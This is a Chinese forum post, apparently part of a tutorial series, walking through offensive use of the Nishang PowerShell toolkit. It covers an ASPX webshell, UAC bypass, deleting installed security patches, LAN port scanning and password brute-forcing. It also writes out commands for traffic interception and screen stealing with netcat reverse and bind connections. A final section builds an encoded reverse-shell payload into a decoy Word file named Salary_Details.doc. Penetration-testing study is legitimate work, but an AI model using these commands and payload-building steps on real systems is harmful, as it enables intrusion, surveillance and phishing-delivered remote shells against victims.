51Testing软件测试论坛

标题: nishang工具进阶实战内容 [打印本页]

作者: lsekfe    时间: 2022-10-21 13:48
标题: nishang工具进阶实战内容
4.3 webshell
  存放于nishangAntak-WebShell目录下,就是一个ASPX的大马,但是命令行是PowerShell,比单纯的cmd强大很多。功能齐全,日aspx的站必备的东西。
[attach]144137[/attach]
同样需要账号密码,上传下载,无所不能。
  4.4 提权
  渗透过程中,这里应该是使用最多的地方了。
  4.4.1 尝试本地权限提升
  Enable-DuplicateToken
  这个脚本在我们具有一定权限的时候,可以帮助帮助我们获得系统权限。
  4.4.2 Bypass UAC
  Invoke-PsUACme 看名字就知道是干嘛的了。绕过UAC吗~,Nishang中给出的方法太全面了,GET-HELP来看看帮助信息。

[attach]144138[/attach]
实例一: 使用Sysprep方法和默认的Payload执行。
  实例二: 使用oobe方法跟默认的payload执行。
  实例三: 使用oobe方法跟自制payload执行。
  这个模块用的是UACME项目的DLL来Bypass UAC。所以,方法对照表。

[attach]144139[/attach]
这只是官方给的例子,回过头来看一眼上面的参数信息。
[attach]144140[/attach]
-Payloadpath指定一个payload路径
  -CustomDll64
  指定一个dll文件,后两位代表系统位数。
  -CustomDll32
  尝试本地Bypass UAC:

[attach]144141[/attach]
4.4.3 删除补丁
  删除补丁,这是我见过最`厉害`的脚本,没有之一。如此骚气!
  Remove-Update

[attach]144142[/attach]
实例一: 删除全部补丁
  实例二: 删除全部的安全补丁
  实例三: 删除指定的补丁
  这是删除之前的补丁情况。

[attach]144143[/attach]
尝试删除第一个补丁。
[attach]144144[/attach]
成功删除了第一个补丁。
  4.5端口扫描,爆破
  4.5.1: 端口扫描
  来详细说明下个个参数
  可以使用 Get-Help Invoke-PortScan -full 查看帮助信息。

[attach]144145[/attach]
-StartAddress 开始的IP地址
  -EndAddress 结束的IP地址
  -ResolveHost 是否解析主机名
  -ScanPort要不要进行端口扫描
  -Port 要扫描的端口(默认很多,看上图)
  -TimeOut 超时时间
  对我本地局域网进行扫描:
  Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost
  扫描中:

[attach]144146[/attach]
扫描结束:
[attach]144147[/attach]
4.5.2 弱口令爆破
  Invoke-BruteForce
  之前先说命令参数。
  -ComputerName 对应服务的计算机名
  -UserList 用户名字典
  -PasswordList 密码字典
  -Service 服务(默认为:SQL)
  -StopOnSuccess 匹配一个后停止
  -Delay 延迟时间

[attach]144148[/attach]
有了上面的说明,这里看到应该很清楚了。不在做过多的解释。
  4.6 嗅探
  内网嗅探,动静太大了,但是,实在没办法的时候,不得不说,这是一个办法。
  在靶机上执行:Invoke-Interceptor -ProxyServer 192.168.250.172 -ProxyPort 9999
  监听机器上执行:netcat -lvvp 9999

[attach]144149[/attach]


[attach]144150[/attach]
4.7 屏幕窃取
  Show-TargetScreen
  屏幕窃取,一样正反向通吃
  -IPAddress 后面加IP地址(反向链接需要)
  -Port 加端口
  -Bind 正向连接
  反向链接窃取屏幕
  靶机:Show-TargetScreen -Reverse -IPAddress 192.168.250.172 -Port 3333
  攻击机:netcat -nlvp 3333 | netcat -nlvp 9999
  之后访问攻击机器的9999端口,就可以窃取到屏幕了
  正向连接窃取屏幕
  靶机执行:Show-TargetScreen -Bind -Port 3333
  攻击机执行:netcat -nv 192.168.250.37 3333 | netcat -lnvp 9999
  之后同样,访问本机的9999端口,就能正常访问了。

[attach]144151[/attach]
4.8 Client
  Nishang可以生成各式各样的客户端。类型大概有这么多类型全都可以生成。选择一种来说,其他的方法都是类似的。

[attach]144152[/attach]
打开nishangShellsInvoke-PowerShellTcpOneLine.ps1这个文件,复制第三行的内容。可以看到中间有一个TCPClient的参数,这里就是远程连接的地址了。
[attach]144153[/attach]
更改这个地址和端口即可,之后进入命令行执行
  Invoke-Encode -DataToEncode '你的代码' -IsString -PostScript

[attach]144154[/attach]
执行完成之后会在当前目录下生成两个文件。一个是encoded.txt 另一个是encodedcommand.txt。之后执行
  Out-Word -PayloadScript .encodedcommand.txt
  就可以在我们当前文件夹下生成一个名为Salary_Details.doc的doc文件。之后使用nc监听就好。说完了操作,回过头来看看命令行参数:
  -Payload 后面直接加payload,但是注意引号的闭合
  -PayloadURL 传入远程的payload进行生成
  -PayloadScript 指定本地的脚本进行生成
  -Arguments 之后加要执行的函数。(payload之中有的函数)
  -OutputFile 输出的文件名
  -WordFileDir 输出的目录地址
  -Recurse 在WordFileDir中递归寻找Word文件
  -RemoveDocx 创建完成后删除掉原始的文件
  5.总结
  看完之后肯定一脸懵逼,这都是啥。这么复杂的语法,没办法,针对PowerShell的工具语法相对而言都比较复杂。而且,并没有讲解nishang的后门模块,个人觉得不是那么好用。还有一些反弹技巧并没有详细介绍,比如说什么DNS反弹,ICMP反弹,WMI反弹。
  有兴趣的朋友可以自行研究,每一款工具针对不同的环境都能给我们带来意想不到的效果。不用归不用,但是到万不得已用的时候,才是最恶心的,艺多不压身嘛~








欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/) Powered by Discuz! X3.2